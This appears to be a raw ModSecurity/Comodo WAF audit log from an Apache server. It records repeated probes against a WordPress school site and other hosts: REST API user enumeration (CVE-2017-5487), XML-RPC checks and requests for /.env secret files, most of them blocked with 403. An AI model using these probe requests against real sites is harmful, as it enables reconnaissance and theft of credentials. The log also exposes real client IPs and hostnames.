WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746672800467899 3267 (- - -) Stopwatch2: 1746672800467899 3267; combined=1437, p1=512, p2=893, p3=0, p4=0, p5=31, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b291045-Z-- --aad9a55a-A-- [08/May/2025:09:53:25 +0700] aBwcpacs1DvJ_HgMHE_x3wAAABY 103.236.140.4 42968 103.236.140.4 8181 --aad9a55a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 110.34.5.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 110.34.5.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --aad9a55a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --aad9a55a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746672805158118 3111 (- - -) Stopwatch2: 1746672805158118 3111; combined=1350, p1=476, p2=833, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aad9a55a-Z-- --5f537975-A-- [08/May/2025:09:53:29 +0700] aBwcqcP9GxxPAbCroFbM6wAAAE0 103.236.140.4 42972 103.236.140.4 8181 --5f537975-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5f537975-C-- demo.sayHello --5f537975-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f537975-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746672809498778 5507 (- - -) Stopwatch2: 1746672809498778 5507; combined=4094, p1=482, p2=3383, p3=31, p4=34, p5=95, sr=70, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f537975-Z-- --37847443-A-- [08/May/2025:09:57:07 +0700] aBwdg44K347NtBcwXKwFswAAAJE 103.236.140.4 42998 103.236.140.4 8181 --37847443-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37847443-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37847443-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746673027299874 3049 (- - -) Stopwatch2: 1746673027299874 3049; combined=1467, p1=483, p2=953, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37847443-Z-- --6024543c-A-- [08/May/2025:09:57:12 +0700] aBwdiCs5rYyn3jlLjjK_LwAAANM 103.236.140.4 43002 103.236.140.4 8181 --6024543c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.177.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.177.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --6024543c-C-- demo.sayHello --6024543c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --6024543c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746673032919345 5001 (- - -) Stopwatch2: 1746673032919345 5001; combined=3770, p1=470, p2=3093, p3=26, p4=28, p5=90, sr=68, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6024543c-Z-- --ac3ae973-A-- [08/May/2025:09:58:45 +0700] aBwd5acs1DvJ_HgMHE_x4gAAABc 103.236.140.4 43036 103.236.140.4 8181 --ac3ae973-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 188.166.108.93 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 188.166.108.93 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --ac3ae973-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac3ae973-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746673125203066 838 (- - -) Stopwatch2: 1746673125203066 838; combined=339, p1=304, p2=0, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac3ae973-Z-- --93b9e81e-A-- [08/May/2025:10:18:24 +0700] aBwigMP9GxxPAbCroFbM8wAAAEU 103.236.140.4 43350 103.236.140.4 8181 --93b9e81e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (MeeGo; NokiaN950-00/00) AppleWebKit/534.13 (KHTML, like Gecko) NokiaBrowser/8.5.0 Mobile Safari/534.13 Accept-Charset: utf-8 --93b9e81e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b9e81e-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746674304184505 826 (- - -) Stopwatch2: 1746674304184505 826; combined=347, p1=302, p2=0, p3=0, p4=0, p5=45, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b9e81e-Z-- --e733e202-A-- [08/May/2025:10:27:56 +0700] aBwkvCs5rYyn3jlLjjK_RAAAANA 103.236.140.4 43418 103.236.140.4 8181 --e733e202-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e733e202-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e733e202-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746674876297504 2620 (- - -) Stopwatch2: 1746674876297504 2620; combined=1072, p1=359, p2=691, p3=0, p4=0, p5=22, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e733e202-Z-- --7ad53f3f-A-- [08/May/2025:10:28:06 +0700] aBwkxo4K347NtBcwXKwGPwAAAI8 103.236.140.4 43422 103.236.140.4 8181 --7ad53f3f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.181 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ad53f3f-C-- demo.sayHello --7ad53f3f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ad53f3f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746674886003993 5882 (- - -) Stopwatch2: 1746674886003993 5882; combined=4130, p1=547, p2=3331, p3=47, p4=44, p5=97, sr=88, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ad53f3f-Z-- --d30f7d57-A-- [08/May/2025:10:29:43 +0700] aBwlJ44K347NtBcwXKwGRwAAAIY 103.236.140.4 43454 103.236.140.4 8181 --d30f7d57-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 159.65.144.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 159.65.144.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d30f7d57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d30f7d57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746674983776025 693 (- - -) Stopwatch2: 1746674983776025 693; combined=277, p1=243, p2=0, p3=0, p4=0, p5=34, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d30f7d57-Z-- --c2ece815-A-- [08/May/2025:10:37:05 +0700] aBwm4Ss5rYyn3jlLjjK_TwAAAMo 103.236.140.4 43494 103.236.140.4 8181 --c2ece815-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.254.28.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.254.28.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c2ece815-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c2ece815-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746675425776285 3239 (- - -) Stopwatch2: 1746675425776285 3239; combined=1423, p1=476, p2=906, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c2ece815-Z-- --8ccc9032-A-- [08/May/2025:10:42:50 +0700] aBwoOqcs1DvJ_HgMHE_x7AAAABQ 103.236.140.4 43564 103.236.140.4 8181 --8ccc9032-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 152.44.253.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.44.253.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8ccc9032-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ccc9032-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746675770498827 2837 (- - -) Stopwatch2: 1746675770498827 2837; combined=1253, p1=442, p2=780, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ccc9032-Z-- --3b3a3f3f-A-- [08/May/2025:10:51:10 +0700] aBwqLo4K347NtBcwXKwGTQAAAJg 103.236.140.4 43608 103.236.140.4 8181 --3b3a3f3f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3b3a3f3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b3a3f3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676270563102 2883 (- - -) Stopwatch2: 1746676270563102 2883; combined=1336, p1=458, p2=847, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b3a3f3f-Z-- --3d28c122-A-- [08/May/2025:10:51:16 +0700] aBwqNKcs1DvJ_HgMHE_x9AAAAAU 103.236.140.4 43612 103.236.140.4 8181 --3d28c122-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3d28c122-C-- demo.sayHello --3d28c122-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d28c122-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676276939789 4709 (- - -) Stopwatch2: 1746676276939789 4709; combined=3412, p1=450, p2=2778, p3=24, p4=27, p5=78, sr=61, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d28c122-Z-- --2bb27c68-A-- [08/May/2025:10:53:05 +0700] aBwqoacs1DvJ_HgMHE_x9wAAAAM 103.236.140.4 43630 103.236.140.4 8181 --2bb27c68-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 121.56.215.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 121.56.215.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2bb27c68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bb27c68-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676385495085 3022 (- - -) Stopwatch2: 1746676385495085 3022; combined=1278, p1=470, p2=783, p3=0, p4=0, p5=25, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bb27c68-Z-- --f2502a67-A-- [08/May/2025:10:59:09 +0700] aBwsDacs1DvJ_HgMHE_x_AAAAA8 103.236.140.4 43652 103.236.140.4 8181 --f2502a67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2502a67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2502a67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676749233867 2784 (- - -) Stopwatch2: 1746676749233867 2784; combined=1243, p1=436, p2=775, p3=0, p4=0, p5=31, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2502a67-Z-- --fc635b06-A-- [08/May/2025:10:59:15 +0700] aBwsE6cs1DvJ_HgMHE_x_gAAABI 103.236.140.4 43656 103.236.140.4 8181 --fc635b06-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fc635b06-C-- demo.sayHello --fc635b06-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc635b06-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746676755727223 5481 (- - -) Stopwatch2: 1746676755727223 5481; combined=4040, p1=510, p2=3267, p3=29, p4=31, p5=130, sr=74, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc635b06-Z-- --e3292645-A-- [08/May/2025:10:59:17 +0700] aBwsFacs1DvJ_HgMHE_x_wAAABE 103.236.140.4 43658 103.236.140.4 8181 --e3292645-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.199.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.199.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e3292645-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3292645-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746676757504047 1427 (- - -) Stopwatch2: 1746676757504047 1427; combined=662, p1=245, p2=399, p3=0, p4=0, p5=18, sr=48, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
